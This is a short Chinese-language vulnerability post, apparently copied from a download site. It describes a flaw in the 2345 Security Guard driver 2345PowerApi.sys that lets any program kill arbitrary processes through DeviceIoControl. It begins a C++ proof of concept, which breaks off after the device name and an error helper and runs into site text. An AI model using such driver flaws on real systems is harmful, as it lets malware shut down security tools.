2345安全卫士PowerApi驱动内核权限杀任意进程漏洞
发表时间:2022-07-03 来源:学卫网整理相关软件相关文章人气:
2345安全卫士采用最新的云计算技术以及全新的第三代查杀引擎,5重环绕式系统防护有效查杀各类新型流行木马。占用电脑磁盘空间小,闪电查杀更快更安全。
软件版本:1.3.0.5363
问题原因:2345PowerApi.sys没有做打开校验,任意程序可以通过DeviceIoControl操作这个驱动,包括但不限于杀任意进程。
// 2345.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include using namespace std;#include#define DEVICENAME L"\\\\.\\2345PowerApi"void PrintErrCodeMessage(char *preMsg){LPVOID lpMsgBuf;DWORD dwErrorCode = GetLastError();if(NULL!=preMsg)printf("%s\n",preMsg);if(FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER (网视站,专业提供浏览器下载)